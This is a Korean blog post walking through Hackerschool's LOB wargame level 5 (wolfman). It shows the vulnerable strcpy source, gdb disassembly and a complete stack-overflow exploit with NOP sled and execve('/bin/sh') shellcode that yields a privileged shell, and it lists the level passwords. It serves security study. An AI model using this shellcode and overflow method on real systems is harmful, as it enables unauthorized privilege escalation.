해킹 공부/시스템 해킹

해커스쿨 LOB level 5 orc

O'bin 2022. 4. 3. 23:28

id : orc

pw : cantata

 

 1.  파일 목록 확인, 소스코드 분석

ls -al로 파일 목록을 보니 이번 단계의 문제 파일은 wolfman인 듯 하다.

 

 

 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
[orc@localhost orc]$ cat wolfman.c // 파일 내용 확인
/*
        The Lord of the BOF : The Fellowship of the BOF
        - wolfman
        - egghunter + buffer hunter
*/
 
#include <stdio.h>
#include <stdlib.h>
 
extern char **environ;
 
main(int argc, char *argv[])
{
        char buffer[40];
        int i;
 
        if(argc < 2){ //입력 값의 길이가 2보다 작으면
                printf("argv error\n");
                exit(0);
        }
 
        // egghunter //이번에도 환경변수 초기화
        for(i=0; environ[i]; i++)
                memset(environ[i], 0, strlen(environ[i]));
 
        if(argv[1][47!= '\xbf')
        {
                printf("stack is still your friend.\n");
                exit(0);
        }
        strcpy(buffer, argv[1]); //strcpy의 취약점 이용해 bof
        printf("%s\n", buffer);
 
        // buffer hunter
        memset(buffer, 040); //level4와 다르게 추가된 코드
}
[orc@localhost orc]$ ./wolfman //파일 실행해보기
argv error
[orc@localhost orc]$ ./wolfman aaaaaaaaaaa
stack is still your friend.
 
cs

 

1
2
3
4
[orc@localhost orc]$ vi mywolfman.c // wolfman.c의 코드를 복사해 mywolfman.c 생성
[orc@localhost orc]$ gcc -o mywolfman mywolfman.c // 컴파일 후 mywolfman이라는 실행파일 생성
[orc@localhost orc]$ ls // 파일 목록 확인 해 mywolfman 실행파일 확인
mywolfman  mywolfman.c  wolfman  wolfman.c
cs

 

 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
[orc@localhost orc]$ gdb -q mywolfman
(gdb) set disassembly-flavor intel
(gdb) disas main
Dump of assembler code for function main:
0x8048500 <main>:       push   %ebp
0x8048501 <main+1>:     mov    %ebp,%esp
.
.
0x80485b9 <main+185>:   lea    %eax,[%ebp-40]
0x80485bc <main+188>:   push   %eax
0x80485bd <main+189>:   call   0x8048440 <strcpy>
0x80485c2 <main+194>:   add    %esp,8
0x80485c5 <main+197>:   lea    %eax,[%ebp-40]
0x80485c8 <main+200>:   push   %eax
0x80485c9 <main+201>:   push   0x8048669
0x80485ce <main+206>:   call   0x8048410 <printf>
0x80485d3 <main+211>:   add    %esp,8
0x80485d6 <main+214>:   push   40
---Type <return> to continue, or q <return> to quit---quit
Quit
cs

gdb로 파일 구조 분석

 

 

[orc@localhost orc]$ ./wolfman `python -c 'print "\x90"*44+"\xe0\xfa\xff\xbf"+ "\x90"*200+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`
àúÿ¿1ÀPh//shh/bin‰ãPS‰á‰Â°
                          Í€
bash$ id
uid=504(orc) gid=504(orc) euid=505(wolfman) egid=505(wolfman) groups=504(orc)
bash$ my-pass
euid = 505
love eyuna
bash$ yeahhhhh
bash$
bash$

 

스택 구조 파악 후 페이로드 작성 해 비밀번호 획득

 

pw : love eyuna

'해킹 공부 > 시스템 해킹' 카테고리의 다른 글

[해커스쿨 LOB] level11_skeleton  (0) 2022.05.15
[해커스쿨 LOB] level 6_wolfman  (0) 2022.04.07
해커스쿨 LOB level 4 goblin  (0) 2022.03.27
해커스쿨 LOB level 3  (0) 2022.03.22
해커스쿨 LOB level 2  (0) 2022.03.20